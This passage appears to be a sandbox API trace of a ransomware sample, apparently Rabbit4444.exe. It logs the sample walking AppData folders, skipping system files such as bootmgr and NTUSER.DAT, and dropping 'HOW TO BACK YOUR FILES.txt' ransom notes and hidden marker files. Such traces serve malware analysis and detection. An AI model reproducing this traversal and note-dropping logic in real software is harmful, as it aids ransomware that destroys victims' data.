lstrcmpiW (lpString1="Roaming", lpString2="bootmgr") returned 1 [0061.539] lstrcmpiW (lpString1="Roaming", lpString2="pagefile.sys") returned 1 [0061.540] lstrcmpiW (lpString1="Roaming", lpString2="boot") returned 1 [0061.540] lstrcmpiW (lpString1="Roaming", lpString2="ids.txt") returned 1 [0061.540] lstrcmpiW (lpString1="Roaming", lpString2="NTUSER.DAT") returned 1 [0061.540] lstrcpyW (in: lpString1=0x11cebba, lpString2="Roaming" | out: lpString1="Roaming") returned="Roaming" [0061.540] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222c0 [0061.540] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x42) returned 0x10b5b0 [0061.540] RtlInterlockedPushEntrySList (in: ListHead=0x1220c8, ListEntry=0x1222c8 | out: ListHead=0x1220c8, ListEntry=0x1222c8) returned 0x1221a8 [0061.540] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3c8c01f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0061.540] FindClose (in: hFindFile=0x102850 | out: hFindFile=0x102850) returned 1 [0061.540] lstrcpyW (in: lpString1=0x11cebba, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.540] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\default\\appdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0061.540] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0061.540] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.541] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.541] CloseHandle (hObject=0x29c) returned 1 [0061.541] CloseHandle (hObject=0x2a0) returned 1 [0061.541] GetCurrentThreadId () returned 0x2d4 [0061.541] RtlInterlockedPopEntrySList (in: ListHead=0x1220c8 | out: ListHead=0x1220c8) returned 0x1222c8 [0061.541] lstrcpynW (in: lpString1=0x11ceb88, lpString2="C:\\Users\\Default\\AppData\\Roaming", iMaxLength=2048 | out: lpString1="C:\\Users\\Default\\AppData\\Roaming") returned="C:\\Users\\Default\\AppData\\Roaming" [0061.541] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10b5b0 | out: hHeap=0xe0000) returned 1 [0061.541] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222c0 | out: hHeap=0xe0000) returned 1 [0061.541] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default\\AppData\\Roaming" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming") returned="C:\\Users\\Default\\AppData\\Roaming" [0061.541] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\") returned="C:\\Users\\Default\\AppData\\Roaming\\" [0061.541] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Default\\AppData\\Roaming\\.BFC0E91B00AE8A0620D3" [0061.541] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\default\\appdata\\roaming\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0061.544] WriteFile (in: hFile=0x2a0, lpBuffer=0x11cdb90*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x11ccb48, lpOverlapped=0x0 | out: lpBuffer=0x11cdb90*, lpNumberOfBytesWritten=0x11ccb48*=0x3d4, lpOverlapped=0x0) returned 1 [0061.547] FlushFileBuffers (hFile=0x2a0) returned 1 [0061.548] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.548] CloseHandle (hObject=0x2a0) returned 1 [0061.549] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming") returned 32 [0061.549] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.549] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\*", lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3c8c01f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee0114f5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0061.549] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.549] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.549] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.549] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.549] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3c8c01f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee0114f5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.549] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.549] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.549] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.549] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.549] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.549] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee0114f5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee0114f5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee0114f5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.549] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.549] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.549] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa2bc7808, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xa2bc7808, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0061.549] lstrcmpiW (lpString1="Microsoft", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.549] lstrcmpiW (lpString1="Microsoft", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.549] lstrcmpiW (lpString1="Microsoft", lpString2="Rabbit4444.exe") returned -1 [0061.549] lstrcmpiW (lpString1="Microsoft", lpString2=".") returned 1 [0061.549] lstrcmpiW (lpString1="Microsoft", lpString2="..") returned 1 [0061.550] lstrcmpiW (lpString1="Microsoft", lpString2="windows") returned -1 [0061.550] lstrcmpiW (lpString1="Microsoft", lpString2="bootmgr") returned 1 [0061.550] lstrcmpiW (lpString1="Microsoft", lpString2="pagefile.sys") returned -1 [0061.550] lstrcmpiW (lpString1="Microsoft", lpString2="boot") returned 1 [0061.550] lstrcmpiW (lpString1="Microsoft", lpString2="ids.txt") returned 1 [0061.550] lstrcmpiW (lpString1="Microsoft", lpString2="NTUSER.DAT") returned -1 [0061.550] lstrcpyW (in: lpString1=0x11cebca, lpString2="Microsoft" | out: lpString1="Microsoft") returned="Microsoft" [0061.550] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft", dwFileAttributes=0x10) returned 1 [0061.550] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1220a0 [0061.550] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x56) returned 0x115988 [0061.550] RtlInterlockedPushEntrySList (in: ListHead=0x1220c8, ListEntry=0x1220a8 | out: ListHead=0x1220c8, ListEntry=0x1220a8) returned 0x1221a8 [0061.550] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa2bc7808, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xa2bc7808, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0061.550] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0061.550] lstrcpyW (in: lpString1=0x11cebca, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.550] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0061.552] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0061.552] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.552] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.552] CloseHandle (hObject=0x29c) returned 1 [0061.552] CloseHandle (hObject=0x2a0) returned 1 [0061.552] GetCurrentThreadId () returned 0x2d4 [0061.552] RtlInterlockedPopEntrySList (in: ListHead=0x1220c8 | out: ListHead=0x1220c8) returned 0x1220a8 [0061.552] lstrcpynW (in: lpString1=0x11ceb88, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft", iMaxLength=2048 | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft" [0061.552] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115988 | out: hHeap=0xe0000) returned 1 [0061.552] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1220a0 | out: hHeap=0xe0000) returned 1 [0061.552] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft" [0061.552] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\" [0061.552] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\.BFC0E91B00AE8A0620D3" [0061.552] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0061.557] WriteFile (in: hFile=0x2a0, lpBuffer=0x11cdb90*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x11ccb48, lpOverlapped=0x0 | out: lpBuffer=0x11cdb90*, lpNumberOfBytesWritten=0x11ccb48*=0x3d4, lpOverlapped=0x0) returned 1 [0061.559] FlushFileBuffers (hFile=0x2a0) returned 1 [0061.561] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.561] CloseHandle (hObject=0x2a0) returned 1 [0061.561] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft") returned 42 [0061.561] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.561] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa2bc7808, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xee037773, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102990 [0061.561] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.561] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.561] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.562] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.562] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa2bc7808, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xee037773, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.562] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.562] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.562] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.562] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.562] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.562] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee037773, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee037773, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee037773, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.562] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.562] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.562] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3c8d333, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0061.562] lstrcmpiW (lpString1="Internet Explorer", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.562] lstrcmpiW (lpString1="Internet Explorer", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.562] lstrcmpiW (lpString1="Internet Explorer", lpString2="Rabbit4444.exe") returned -1 [0061.562] lstrcmpiW (lpString1="Internet Explorer", lpString2=".") returned 1 [0061.562] lstrcmpiW (lpString1="Internet Explorer", lpString2="..") returned 1 [0061.562] lstrcmpiW (lpString1="Internet Explorer", lpString2="windows") returned -1 [0061.562] lstrcmpiW (lpString1="Internet Explorer", lpString2="bootmgr") returned 1 [0061.562] lstrcmpiW (lpString1="Internet Explorer", lpString2="pagefile.sys") returned -1 [0061.562] lstrcmpiW (lpString1="Internet Explorer", lpString2="boot") returned 1 [0061.562] lstrcmpiW (lpString1="Internet Explorer", lpString2="ids.txt") returned 1 [0061.562] lstrcmpiW (lpString1="Internet Explorer", lpString2="NTUSER.DAT") returned -1 [0061.562] lstrcpyW (in: lpString1=0x11cebde, lpString2="Internet Explorer" | out: lpString1="Internet Explorer") returned="Internet Explorer" [0061.562] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1220a0 [0061.562] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x7a) returned 0x101c88 [0061.562] RtlInterlockedPushEntrySList (in: ListHead=0x1220c8, ListEntry=0x1220a8 | out: ListHead=0x1220c8, ListEntry=0x1220a8) returned 0x1221a8 [0061.562] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa2bc7808, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xa2bc7808, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xa2bc7808, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network", cAlternateFileName="")) returned 1 [0061.562] lstrcmpiW (lpString1="Network", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.562] lstrcmpiW (lpString1="Network", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.562] lstrcmpiW (lpString1="Network", lpString2="Rabbit4444.exe") returned -1 [0061.562] lstrcmpiW (lpString1="Network", lpString2=".") returned 1 [0061.562] lstrcmpiW (lpString1="Network", lpString2="..") returned 1 [0061.562] lstrcmpiW (lpString1="Network", lpString2="windows") returned -1 [0061.563] lstrcmpiW (lpString1="Network", lpString2="bootmgr") returned 1 [0061.563] lstrcmpiW (lpString1="Network", lpString2="pagefile.sys") returned -1 [0061.563] lstrcmpiW (lpString1="Network", lpString2="boot") returned 1 [0061.563] lstrcmpiW (lpString1="Network", lpString2="ids.txt") returned 1 [0061.563] lstrcmpiW (lpString1="Network", lpString2="NTUSER.DAT") returned -1 [0061.563] lstrcpyW (in: lpString1=0x11cebde, lpString2="Network" | out: lpString1="Network") returned="Network" [0061.563] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122340 [0061.563] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x66) returned 0x120568 [0061.563] RtlInterlockedPushEntrySList (in: ListHead=0x1220c8, ListEntry=0x122348 | out: ListHead=0x1220c8, ListEntry=0x122348) returned 0x1220a8 [0061.563] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x2c416743, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x2c416743, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0061.563] lstrcmpiW (lpString1="Windows", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.563] lstrcmpiW (lpString1="Windows", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.563] lstrcmpiW (lpString1="Windows", lpString2="Rabbit4444.exe") returned 1 [0061.563] lstrcmpiW (lpString1="Windows", lpString2=".") returned 1 [0061.563] lstrcmpiW (lpString1="Windows", lpString2="..") returned 1 [0061.563] lstrcmpiW (lpString1="Windows", lpString2="windows") returned 0 [0061.563] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x2c416743, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x2c416743, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0061.563] FindClose (in: hFindFile=0x102990 | out: hFindFile=0x102990) returned 1 [0061.563] lstrcpyW (in: lpString1=0x11cebde, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.563] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0061.563] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0061.564] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.565] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.565] CloseHandle (hObject=0x29c) returned 1 [0061.565] CloseHandle (hObject=0x2a0) returned 1 [0061.565] GetCurrentThreadId () returned 0x2d4 [0061.565] RtlInterlockedPopEntrySList (in: ListHead=0x1220c8 | out: ListHead=0x1220c8) returned 0x122348 [0061.565] lstrcpynW (in: lpString1=0x11ceb88, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network", iMaxLength=2048 | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network" [0061.565] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x120568 | out: hHeap=0xe0000) returned 1 [0061.565] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122340 | out: hHeap=0xe0000) returned 1 [0061.565] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network" [0061.565] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\" [0061.565] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\.BFC0E91B00AE8A0620D3" [0061.565] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\network\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0061.567] WriteFile (in: hFile=0x2a0, lpBuffer=0x11cdb90*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x11ccb48, lpOverlapped=0x0 | out: lpBuffer=0x11cdb90*, lpNumberOfBytesWritten=0x11ccb48*=0x3d4, lpOverlapped=0x0) returned 1 [0061.569] FlushFileBuffers (hFile=0x2a0) returned 1 [0061.570] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.570] CloseHandle (hObject=0x2a0) returned 1 [0061.571] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network") returned 50 [0061.571] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.571] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\*", lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa2bc7808, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xa2bc7808, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xee05db14, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0061.571] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.571] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.571] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.571] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.571] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa2bc7808, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xa2bc7808, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xee05db14, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, 